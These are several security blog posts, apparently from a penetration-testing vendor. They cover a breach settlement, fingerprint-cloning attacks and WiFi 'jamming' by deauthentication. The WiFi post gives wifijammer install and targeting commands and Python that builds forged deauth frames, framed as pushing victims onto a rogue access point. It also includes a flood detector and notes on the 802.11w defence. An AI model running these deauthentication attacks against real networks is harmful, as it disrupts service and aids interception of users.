Zappos Ordered to Pay Fine in Wake of Breach

The office of Massachusetts Attorney General Martha Coakley’s Consumer Protection Division recently announced the details of a $106K multi-state settlement reached with online retailer Zappos, which in 2012 was the target of a widely publicized attack that exposed the personal information of over 24 million users. The Attorney General’s investigation found potential violations of the state’s data protection laws after data including consumers’ email addresses, names, and shipping addresses were stolen, though no evidence was found that financial information was taken.

While data security should always be of the utmost importance to an organization, this settlement is yet another clear reminder of the consequences for failing to protect the information of your customers.


Settlement Requirements

Aside from the fine, which must be paid in 30 days, the settlement also requires Zappos to:


  • Provide annual security training to employees
  • Maintain and adhere to information security policies
  • Provide Attorney General with customer information security policy
  • Demonstrate compliance with the Payment Card Industry Data Security Standard
  • Obtain a third-party security audit and provide report of findings to Attorney General


Having a strong security policy, properly training employees, and seeking out third-party security audits should be common operating procedure for any retailer; if there is anything surprising about this settlement it’s that these steps were not already being adhered to internally at Zappos.


Growing Trend

Litigation is increasingly the end result for corporate data breaches, and this isn’t the first investigation that Coakley’s Consumer Protection Division has had a hand in. They’ve been involved in a number of high profile cases, including the data breaches at Target and TD Bank.

In a press release, Coakley stated: “Our office will continue to hold retailers accountable for failing to follow their own policies regarding consumer data that they maintain, and make sure that all companies have reasonable data security measures in place.”

With groups like Coakley’s Consumer Protection Division aggressively prosecuting businesses (online and off) that fail to properly secure their customers’ information, it’s likely we’ll only be seeing more cases like this in the future. While it would be better for all involved if these attacks never occurred, the biggest mistake would be not to learn from them; with luck, the public relations fallout from these attacks will help ensure other retailers take steps to more vigorously protect their customers.

Mobile WiFi Jamming (Disrupting WiFi Networks with Mobile Devices)


At this point, everyone should be pretty familiar with the “rogue AP” concept: an attacker creates an innocent enough looking WiFi access point, hopes people connect to it, and then does nasty things when they do. It’s simple to set up, hard for the average user to detect, and increasingly common.

But putting up an access point is only half the battle. How do you get victims to actually connect to a rogue AP once it’s set up? An attacker can give it a tempting name, and if it’s the only open AP in an area with nothing but encrypted networks it may have a shot, but more often than not client machines will reconnect to the network they already know and ignore any other APs that may have popped up. So the question is, how could one nudge an unsuspecting user off of their own WiFi network and onto another one?

One way is to simply blast the rival networks off the air.


Air Superiority

To be very clear, calling this technique jamming is inaccurate, but that hasn’t stopped a number of developers from using the term, so we’ll play along for the sake of consistency. To properly jam WiFi (or any other form of radio communication), you blast out a lot of random noise on the frequencies that particular technology uses. It’s conceptually very simple, but also a very big infraction as far as our friends at the Federal Communications Commission are concerned, and it isn’t something you can do with consumer-level WiFi hardware anyway.

Since jamming at the hardware level is out of the question, a number of developers have found a way to clog up WiFi communications in software. This is much closer to a denial of service attack: tools repeatedly spam spoofed deauthentication packets at WiFi access points and clients to force them to disconnect. It works because 802.11 management frames are not authenticated on networks that don’t use 802.11w (Protected Management Frames), so neither the AP nor the client can tell a forged deauthentication from a real one. With the appropriate software and a powerful WiFi adapter that supports packet injection, an attacker can put a stranglehold on legitimate communications.

There are a couple of ways it can be done, but for this example we will look at wifijammer by Dan McInerney.


Installing Wifijammer

This tool takes the form of a single Python script, wifijammer.py, that you can grab right from GitHub. Installing it on your device is as simple as opening the terminal and running:

git clone https://github.com/DanMcInerney/wifijammer.git


Once you’ve cloned the Git repository and entered the newly created directory, you should be able to run it right away. Unfortunately, when you try to run it you’ll probably get an error about not being able to find “./dvips”.


A little digging around shows this is actually a bug in the python-pyx package that’s been floating around since at least 2012. You can get around this by simply removing the python-pyx package with “apt”, but that will also remove wifitap, which you may not want to do.

In the end, as silly as it sounds, the easiest workaround for this bug is to simply create an empty directory named “dvips” so it finds what it’s expecting:


mkdir ./dvips


After creating the directory (or removing python-pyx), you just need to plug in your external WiFi adapter and you’re set.

Note: In testing, it has been found that unplugging the external WiFi adapter after running wifijammer has a tendency to lock up the device. It’s suggested that you shutdown the device before disconnecting the external adapter to prevent data loss.


Radius Jamming

If run with no options, wifijammer selects the strongest WiFi interface on your device that supports packet injection (your external WiFi adapter) and puts it into monitor mode. It spends a few seconds on each WiFi channel collecting data, and once it has a list of clients and APs, it starts rapidly cycling through them and firing off deauthentications.

The top of the screen will show the devices that have been deauthenticated, while the bottom of the screen will continually scroll devices that wifijammer has detected.


With a powerful external WiFi adapter, a setup like this will destabilize the WiFi networks within a fairly large radius, say a few hundred feet.

But it is a completely non-discriminatory attack: it will try to knock out every WiFi network it sees. It may be advantageous to jam one specific access point, or perhaps even just one client device. In other cases the broad-radius attack may fail and a more direct approach is required. For those situations, wifijammer has a number of options to tailor the attack to the situation at hand.


Targeted Jamming

The advanced parameters for wifijammer let you specify things like the target’s MAC address and channel, as well as some under the hood options like how many packets to send and how long to wait between deauthentications.

A good starting point for experimentation is something like the following:


wifijammer -c <CHANNEL> -a <TARGET MAC> -p 5 -d


Aside from the obvious channel and target variables, the -p option tells wifijammer to send 5 deauthentication packets per burst, and the -d option disables sending deauthentication packets to the broadcast address (this speeds up the attack, and many devices ignore broadcast deauthentications anyway).
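To make the two mechanics concrete (the forged deauthentication frames described under Air Superiority, and the per-burst and broadcast behaviour the -p and -d options control above), here is an added example written for this post; it is not wifijammer’s own code and does not describe its internals. It builds raw 802.11 deauth frames the way an injector would, models a targeted burst, and then takes the defender’s side by flagging a deauth flood in a monitor-mode capture. The MAC addresses, timestamps and reason codes are constructed sample data, and frames are assumed to be bare MAC-header bytes with no radiotap header and no FCS.

```python
"""Added example: raw 802.11 deauthentication frames and a deauth-flood detector.
Assumptions (this example's, not wifijammer's): frames are bare 802.11 MAC-header
bytes (no radiotap, no FCS); MACs, timestamps and reason codes are constructed."""
import struct
from collections import defaultdict, deque

BROADCAST = "ff:ff:ff:ff:ff:ff"
FC_DEAUTH = 0xC0       # frame-control byte 0: version 0, type 0 (management), subtype 12 (deauth)
REASON_CLASS3 = 7      # "class 3 frame received from non-associated STA", common in injection tools
AP = "00:11:22:33:44:55"        # constructed sample BSSID
CLIENT = "66:77:88:99:aa:bb"    # constructed sample client

def mac_to_bytes(mac):
    return bytes(int(octet, 16) for octet in mac.split(":"))

def bytes_to_mac(raw):
    return ":".join(f"{b:02x}" for b in raw)

def build_deauth(dst, src, bssid, reason=REASON_CLASS3, seq=0):
    """26-byte deauth frame as an injector puts it on the air: 24-byte management
    header (frame control, duration, addr1=dst, addr2=src, addr3=bssid, sequence
    control) plus a 2-byte reason code. Nothing here is authenticated without 802.11w."""
    header = struct.pack("<BBH", FC_DEAUTH, 0x00, 0)      # frame control, flags, duration
    header += mac_to_bytes(dst) + mac_to_bytes(src) + mac_to_bytes(bssid)
    header += struct.pack("<H", (seq & 0x0FFF) << 4)      # sequence number in the upper 12 bits
    return header + struct.pack("<H", reason)

def deauth_burst(ap, client, packets=5, skip_broadcast=True):
    """One round of a targeted attack, modelled on the -p <n> / -d options: each
    packet forges a deauth in both directions (the "AP" telling the client to leave,
    the "client" telling the AP it left) and, unless skip_broadcast, one to broadcast.
    The exact pairing is this example's assumption, not wifijammer's behaviour."""
    frames = []
    for seq in range(packets):
        frames.append(build_deauth(client, ap, ap, seq=seq))
        frames.append(build_deauth(ap, client, ap, seq=seq))
        if not skip_broadcast:
            frames.append(build_deauth(BROADCAST, ap, ap, seq=seq))
    return frames

def parse_deauth(frame):
    """Return (dst, src, bssid, reason) for a deauth frame, or None for anything else."""
    if len(frame) < 26 or (frame[0] & 0xFC) != FC_DEAUTH:   # mask off protocol-version bits
        return None
    dst, src, bssid = frame[4:10], frame[10:16], frame[16:22]
    reason = struct.unpack_from("<H", frame, 24)[0]
    return bytes_to_mac(dst), bytes_to_mac(src), bytes_to_mac(bssid), reason

def detect_deauth_flood(captured, threshold=10, window=2.0):
    """Defender's side: flag each BSSID that sees `threshold` deauths inside `window`
    seconds. `captured` is an iterable of (timestamp_seconds, raw_frame) as a
    monitor-mode capture would yield. One deauth is normal churn (a client leaving);
    a burst against one BSSID is an injector. Returns [(bssid, first_alert_ts), ...]."""
    recent = defaultdict(deque)
    alerts, alerted = [], set()
    for ts, frame in sorted(captured, key=lambda item: item[0]):
        parsed = parse_deauth(frame)
        if parsed is None:
            continue
        bssid = parsed[2]
        times = recent[bssid]
        times.append(ts)
        while times and ts - times[0] > window:   # slide the window forward
            times.popleft()
        if len(times) >= threshold and bssid not in alerted:
            alerted.add(bssid)
            alerts.append((bssid, ts))
    return alerts

def sample_capture():
    """Constructed capture, not real traffic: one legitimate deauth from a client
    that is leaving (reason 3), one data frame, then a 5-packet burst 5 s later."""
    capture = [
        (0.0, build_deauth(AP, CLIENT, AP, reason=3)),
        (0.5, bytes([0x08, 0x00]) + bytes(24)),   # data frame; the detector ignores it
    ]
    for i, frame in enumerate(deauth_burst(AP, CLIENT, packets=5)):
        capture.append((5.0 + i / 100, frame))
    return capture

if __name__ == "__main__":
    for bssid, ts in detect_deauth_flood(sample_capture()):
        print(f"deauth flood against {bssid} at t={ts:.2f}s")
```

On a real system the frames from build_deauth would be handed to an injection-capable monitor-mode interface (for instance via a raw socket or scapy’s sendp), and frames read from a capture would first have their radiotap header stripped before parse_deauth sees them. The detector is deliberately dumb about the source address, because the whole point of the attack is that addr2 is spoofed; counting per BSSID is what survives that. On a network using 802.11w, the client discards these forged frames, but they are still visible in monitor mode, so the detector keeps working there.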


Practical Use

In practice, tools like wifijammer can be used to knock out some or all of the WiFi networks in a target area, which can lead unsuspecting users to a rogue AP under an attacker’s control. It’s important to realize that attacks like this cannot literally force a target to switch networks (the user would still need to select the rogue AP in their device’s network settings), and that clients and APs using 802.11w Protected Management Frames will simply discard the forged frames; but against the typical unprotected network it may give users the impetus to check for additional networks where they otherwise wouldn’t have.

When deployed from a mobile device like the Pwn Pad or Pwn Phone, WiFi jamming attacks can be especially effective, as the source of the transmission can be brought in extremely close to the targets (such as in a coffee shop, office, or other public place) without arousing suspicion.

Rethinking Biometric Security

For many, biometrics are seen as the ideal second factor for two-factor authentication, where a user must supply something they know (a password or PIN) along with a second, independent factor. Most systems today implement that second factor as something the user has: a security token, either a hardware device (such as the RSA SecurID fob) or software running on a smartphone (Google Authenticator), both of which have their logistical problems. Supplanting these tokens with something the user is, such as a fingerprint or iris scan, would take a lot of the implementation headaches out of two-factor authentication.

But new attacks have shown that the most common form of biometric authentication, fingerprint scanning, is not nearly as secure as originally thought. The next generation of scanners aims to increase security, but is it too little, too late?


High Profile Vulnerabilities

Hacking fingerprint scanners by cloning fingerprints is hardly new, but it definitely got a lot of mainstream attention when it was shown that Apple’s iPhone 5S was susceptible to this type of attack just days after its release. Chaos Computer Club member Jan “Starbug” Krissler created a detailed guide on how a print could be “lifted” from a smooth surface (such as a drinking glass) and reproduced in a form that can be glued to an attacker’s own finger. A video was released that even showed how to recover a usable fingerprint from the iPhone’s screen using nothing more exotic than a desktop scanner.

These hacks were by no means simple: they required patience, skill, and even some volatile chemicals. But it was very much possible, and anyone with the drive to follow the widely available information could replicate it without much expense. If somebody wanted into your iPhone badly enough, it was clear they could do it.

Many hoped that the iPhone 6 would pack in a more sensitive fingerprint scanner that would be harder to trick, but upon its release, it was demonstrated that the same method worked on the newer device as well.

But to many, this didn’t come as a surprise. The fingerprint scanner on the iPhone is meant to be more convenient, but not necessarily more secure, than simply using a traditional PIN to unlock the device. For the average user, the iPhone’s fingerprint authentication would work fine, but it shouldn’t be relied on for high security applications.


Hands Free Hack

As if his attack against the iPhone wasn’t enough, Krissler has recently released information on how he was able to create a duplicate fingerprint using nothing more than high-resolution images of the target’s hands.

In his demonstration at the 31st Chaos Communication Congress, Krissler showed how he was able to use images of German Defense Minister Ursula von der Leyen’s thumbs and the commercially available VeriFinger SDK to create a replica of her fingerprint without ever having access to a physical object she touched. Given the availability of high-resolution images of public figures, this attack could conceivably have far-reaching security implications.

During his presentation, Krissler quipped that “After this talk, politicians will presumably wear gloves when talking in public.” While the statement was in jest, it will be interesting to see if policy on photographing public officials will be in any way impacted by Krissler’s work.


Next Generation Hardware

With attacks like these already in the wild, it’s clear that fingerprint authentication needs to be rethought. New approaches to fingerprint scanning include what are known as “living biometrics”, where it isn’t enough to simply have an image of a fingerprint, the scanner must also see evidence of living processes.

One such method is finger vein recognition, where the veins in the finger (which are as unique to each individual as the fingerprint itself) are photographed through the use of infrared light. Since the veins are under the skin, there’s no way to duplicate them using images of the hands or prints lifted off of glass, as these only give surface details.

While the technology and method is still being actively researched, the results so far are very promising. Britain’s Barclays bank has announced that this year they will be making vein recognition systems available to their commercial customers, with a full rollout to follow if it’s successful.
While it will be quite some time before we see vein recognition hardware on our smartphones, the technology will one day become common enough that a user’s finger may still end up being as worthwhile a security token as anything currently available.

Social Engineering: The dangers of positive thinking

CSO Online


Jan 5, 2015

By Steve Ragan


The assumption that everything’s okay is a risky one

CSO Online recently spoke to a person working in the security field with a rather unique job. He’s paid to break into places, such as banks and research facilities (both private and government), in order to test their resistance to social engineering and physical attacks.

Rarely is he caught, but even when he is, it doesn’t matter, and the reason for his success is the same in each case – human nature.

Caught on film:

When the surveillance video starts playing, the images show a typical day at a bank somewhere in the world. Business is steady, but the lobby isn’t overly packed with customers, so a single teller is working the window.

(Original Article)

Happy New Year!

The Pwnie Express team wishes you a Happy New Year, and will be back with our usual content next week.


It’s been a great 2014, and we can’t wait to see what’s in store!